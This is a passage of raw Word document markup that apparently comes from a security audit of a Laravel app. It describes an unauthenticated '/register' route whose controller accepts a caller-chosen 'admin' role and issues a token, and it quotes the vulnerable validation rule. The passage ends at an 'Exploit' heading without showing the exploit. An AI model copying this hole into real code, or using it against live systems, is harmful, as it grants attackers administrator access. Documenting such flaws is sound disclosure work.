                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>Route::post(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>'/register', [</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>AuthController</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class, 'register']);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="415" name="Rectangle 415"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1123268"/>
                            <a:ext cx="7765836" cy="148367"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2ADDC606" w14:textId="6EFB95E9" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>Registered outside every middleware group. The controller then accepted the caller's own choice of privilege</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="416" name="Shape 416"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1276349"/>
                            <a:ext cx="1333500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4651"/>
                                  <a:pt x="1333500" y="6896"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="135982"/>
                                  <a:pt x="1332570" y="138224"/>
                                  <a:pt x="1330710" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="141945"/>
                                  <a:pt x="1326605" y="142875"/>
                                  <a:pt x="1323975" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>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17" name="Rectangle 417"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="26938" y="1300006"/>
                            <a:ext cx="1705465" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="132BF1E9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>AuthController.php:163</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="418" name="Rectangle 418"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1336328" y="1294716"/>
                            <a:ext cx="43855" cy="148369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5B86C730"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419" name="Shape 419"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1371600" y="1276349"/>
                            <a:ext cx="2266950" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2266950" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2257425" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2260055" y="0"/>
                                  <a:pt x="2262300" y="930"/>
                                  <a:pt x="2264160" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2266020" y="4651"/>
                                  <a:pt x="2266950" y="6896"/>
                                  <a:pt x="2266950" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2266950" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2266950" y="135982"/>
                                  <a:pt x="2266020" y="138224"/>
                                  <a:pt x="2264160" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2262300" y="141945"/>
                                  <a:pt x="2260055" y="142875"/>
                                  <a:pt x="2257425" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="13598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20" name="Rectangle 420"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1396305" y="1300006"/>
                            <a:ext cx="2945803" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="46030252" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>'role' =&gt; '</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>required|</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>in:admin</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>,employee</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>'</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="421" name="Rectangle 421"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3638252" y="1294716"/>
                            <a:ext cx="1552874" cy="148369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5E467009" w14:textId="4A2FB91E" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">  wrote it through at </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="422" name="Shape 422"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4810124" y="1276349"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281101" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135982"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281101" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="13598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23" name="Rectangle 423"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4832896" y="1300006"/>
                            <a:ext cx="310085" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2519492F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>:227</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="424" name="Rectangle 424"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5093047" y="1294716"/>
                            <a:ext cx="1605829" cy="148369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="267FD903" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>, and minted a token at</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="425" name="Shape 425"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1447799"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135982"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>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26" name="Rectangle 426"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="26938" y="1471456"/>
                            <a:ext cx="310085" cy="140101"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="695721FF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>:232</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="427" name="Rectangle 427"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="287089" y="1466166"/>
                            <a:ext cx="43855" cy="148369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3E2FD52D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="428" name="Rectangle 428"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1732866"/>
                            <a:ext cx="2841771" cy="148369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="66808FE7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t>Exploit, executed against the original:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="79C5FA34" id="Group 25690" o:spid="_x0000_s1026" style="width:510.25pt;height:145.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,18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2ZkgoAAOhJAAAOAAAAZHJzL2Uyb0RvYy54bWzsXG2P2zYS/n7A/QfD3y8rUpQoLbIp2qYJ&#10;Djhci7b3A7RaeW1AtgxZm93019/Dl6FImXHsNPC28eZD1hbfhvMMOc8MKb/+7mndzj40/W7VbW7m&#10;7FUynzWburtbbe5v5v/7/d2/ivlsN1Sbu6rtNs3N/GOzm3/35p//eP24vW54t+zau6afoZPN7vpx&#10;ezNfDsP2+upqVy+bdbV71W2bDQoXXb+uBnzt76/u+uoRva/bK54k+dVj199t+65udjs8fWsK5290&#10;/4tFUw8/Lxa7Zpi1N3PINuj/e/3/rfr/6s3r6vq+r7bLVW3FqL5AinW12mBQ19XbaqhmD/1qr6v1&#10;qu67XbcYXtXd+qpbLFZ1o+eA2bBkMpv3ffew1XO5v3683zo1QbUTPX1xt/V/P7zvt79tf+mhicft&#10;PXShv6m5PC36tfoLKWdPWmUfncqap2FW42EuioTxfD6rUcYKIQTnRqn1Eprfa1cvf/pMyysa+CoQ&#10;53ELA9mNOtj9OR38tqy2jVbt7ho6+KWfre5u5qmQ89mmWsNQdYWZeqAVo2s5Ne2ud9DYJ3XEM8lk&#10;ZtQQVZRkIjUV3Gyr6/phN7xvOq3y6sN/doOxzTv6VC3pU/20oY89LPygbW+rQbVTsqqPs0cPs+XN&#10;3Eqiitfdh+b3TlccFG6sTDIsGcIcko412o1fMxe5FFIEdalG/XC7qn9o/gjryyRJ2FgfsukhcyG5&#10;SM2gomBGg65IyNyMwYTIVRlECrunQamJtU1MIUt4aZtQJfq7X1kmZSr03oARqBr9peqYsRVHMl5y&#10;LaxXPRTMNXLTkywtimIyQ6cVDYtdSNR21HFgPuFAoZQjhEETqhQ2NeOwPONGy/syMJGUVDaVnjGZ&#10;G+ACdYRDhN/MgKVQ2wcgkoyVWeprRKY5FSWZ1CuRLCXLCjtaUkgIFbOG2GipLFMzWgIbDPTPBcPq&#10;V4IkohRBERN2JciE50zL+BnbM8LlmBDXG4FnGaR9M31T0QBlJkHl9NfiQiJA0RnNl6rEZuqmAwUH&#10;Wh1VkOaBiTmdZpmMr6/YOA4k9Gv96QRYSKIFJuxGU/nkQo4NNFrfZGsYTTYYfzR+Wsphr3Xb7Rqj&#10;crUz6u3E7ZYa3nE/bjdq4wRWdQWSsmirQXv79WoAe2lXa+yWXO1pbotBb8pjGTehPw0f20Ztru3m&#10;12YBb6M9qnqw6+9vf2z72YdKcRT9T3detdtlZZ/afm1VLaruR7VfrNrWdcl006BLlvAf3H5pK6t2&#10;jaZHrmViWtZWGsORwDQwaWJKUIprpEfuNoNrvwG/02J6s1Ufb7u7j5pdaIXAhSuecQZfLrC6rS//&#10;FU6y2ty3zUw9BORKAHj9Y/05K9Lc7gfkzmH1JRaJoT0C5Xp3goKING17Yz0z9eFmrvy0QdV6dlSl&#10;KkqV7Ub9v+neAUzaBvZsaHi6fbLSG63Oll3/x8+g34u2g33CgetPc8XIMagqnc/af29AlgDjQB96&#10;+nBLH/qh/bHTFNmI8f3D0C1WioFo1Mxo9ss5ISxjEGpHfjSEWYb9z7iRCI4iLbLsGWDUdFNzhnGN&#10;fOtoMtigT64FHpyyGDMQUp+RYjeysQRL0oLD0ZrlmKYpqplVRMvxbOTaiQJyzYwkakmN1Nk6x0yJ&#10;ewS3xu5dwLMEdQ+5fYyPYb36zusmUAuCDjVoiQrQj1eUidQUcVnQVjZxlxEij8EkL01DgVBw0qnB&#10;BOPlhaFo3oCurFSaMGCFA9IsLf8hiNEd44CbGlG1sHGsUS4McfKkcNIzXuSl3li8UqcUlsLyjqdE&#10;UItTNUs1EQu17RBSFmJCzHHYEW9rP59XjtahAjZocUgzQMTAti+ByO0i2xedK4pnxjlJIcredLM9&#10;LdPzKTb03AM6BJgmZ4A21T1TouKwkV95apMk49SO3ZxPWhlOiZOl5vQeLECHH21bodiXwlR/evuO&#10;v6NldkFMlSEVYhyjx1TxEAv/aJqTM8ERZqlVBrqT2a3MOciUyQIPLV9FqpHyFeQgiYx+bb6qiY4O&#10;My+I6PAYnk4JR0UeLElkZvIRgnGe2BDeAcqyoiyAt867pklpQuwzBCAmUUq2eRlxCFI+kQWqITl6&#10;gXqAZogXKdNFgAoukRJ+NkB1guaCVigUvb/jOiWcukJlloHzGfbrABUlS1SG+HlWqKbHFwQo2Ow+&#10;oE4JRwFqOSeiC76X7pG5WrTkP8+Y79HbreZEFwQmFB0mCpwCTgGSyzwVe0RIJQeAtF6VArEWxZFE&#10;hM6XKdDZAYiiMgVGkj+XKUh5WtoAn+KIQ2EQwrs8T0wUGEQjKCgKGwNOwhdEi4lUeRxFM2VJJHIS&#10;rsQyBSkOQqRpiNhIN3QhLykCnSI+0ljHyrzwLhyQZmmDfq+7o+NhU9HIx9KsLIKTEZQ66XFux3FC&#10;5gf0nlJwSJGAlsVC9lBmknVUNROsFNoax8mPCFkLCYYd8R5LwQDDgULluEgzaEF1wpZGRBexji1I&#10;Phfk7ovuouYDCqFR/ag8ClisomcMVEx/TX9OAs9OqUZsnm4yE5N38w/WiNMjrbSwy5eIXV29cWdD&#10;39zZEnP3RPyI/bS7IjwvUxxR6aydOvWz+x7xRyaTDDZJnurcIbuby4VEeLHDQnbaYSH2rhyu02Y6&#10;SyHZBNLpYZPmJucK2d1cLgRQd3RobnLBuVLO4igOyVLAZ89dcLa/zyQ5fHOpWNLzM0knyldikjhK&#10;k2JyPnXIdWL8BOcB2vADL4kCnlolTtwqigQUfDqTVJNNeJxJqjKNSYRJ+mUeeQj9Ns3SUgivuygx&#10;CRvHGk2ZpC/9PpNEqVPKAeL0iWGdqiN0zENon8f5eI+lfyMmGVOIsjfjXKd8nZ5PsaHn3vFx2HFo&#10;Haa6Z0pUHDby2e00uiEZpxFRjLuGvYbfzBgvDFZfpDrtdtSlnjmpHXQvYYaHp5w5sbTMcTJul1mE&#10;w3IEtAUSo9ZHnpvDOo9/GZQHd5AjkJ52jAgGi6sVOL9SYQng2+OwLMuQNKO0trr5dlYWO14ZuhBM&#10;3VGipbHm9YqjT51wVRbvZwAujWeMxha4FIS94C/AYq0kX4vEylxfCcPEKUdzyEHjdoe+CUjVKcfF&#10;C6YOy5X+pgy24OUXEdhCFJ/ir1YFGGxKFfhY5FGOkAbQ/CwRHVscT179NlN+xEfBI9R11MapzHXU&#10;cIS4jrCMzNRhM0I8Fr7Q1sMZ4BfaSi9Z/Z0v9V8sbY3dxDDvt5zgE5GlwzGTiQ4jtDXFXY3i2TKv&#10;48WvC6E4sbsY5oTtaEgzvLGXqJc34TnjtBUnnfBQxHPOTlvd5a8LwRSrJzjBN9e1j8bTOCm8HiYl&#10;3cqmcxEiQi+E9QBhtU4+vObPR4rmnYmGFDL8RkTyhbD6ry/rkIAsdHpm78URIyf9VghrGGBYFejr&#10;FvbGA1Wgv37y0wtbqJj+Wjujtws866QaMbt8yXe+5Dv3fzQj/ssO+iXz/XznaffKvBN7JMaEeSNo&#10;fAvtmWmju458IRQjdgWDu2sLRx3yqletCpBCxRpFnjP83IC+YEVc41kP7M2NfkWZLgTQ2BUMXKc4&#10;5UTCuiSJAG+KJbJXTEpk8gxxPHsE4O4iPzea+nd18HNC+pzM/vSR+r0i/7t+1Xv8gaY3/wcAAP//&#10;AwBQSwMEFAAGAAgAAAAhAN5kGczcAAAABgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C&#10;/2EZwZvdTaRiYzalFPVUBFtBeptmp0lodjZkt0n679160cvwhje8902+nGwrBup941hDMlMgiEtn&#10;Gq40fO3eHp5B+IBssHVMGi7kYVnc3uSYGTfyJw3bUIkYwj5DDXUIXSalL2uy6GeuI47e0fUWQ1z7&#10;SpoexxhuW5kq9SQtNhwbauxoXVN52p6thvcRx9Vj8jpsTsf1Zb+bf3xvEtL6/m5avYAINIW/Y7ji&#10;R3QoItPBndl40WqIj4TfefVUquYgDhrSRRSyyOV//OIHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAyHZNmZIKAADoSQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEA3mQZzNwAAAAGAQAADwAAAAAAAAAAAAAAAADsDAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPUNAAAAAA==&#10;">
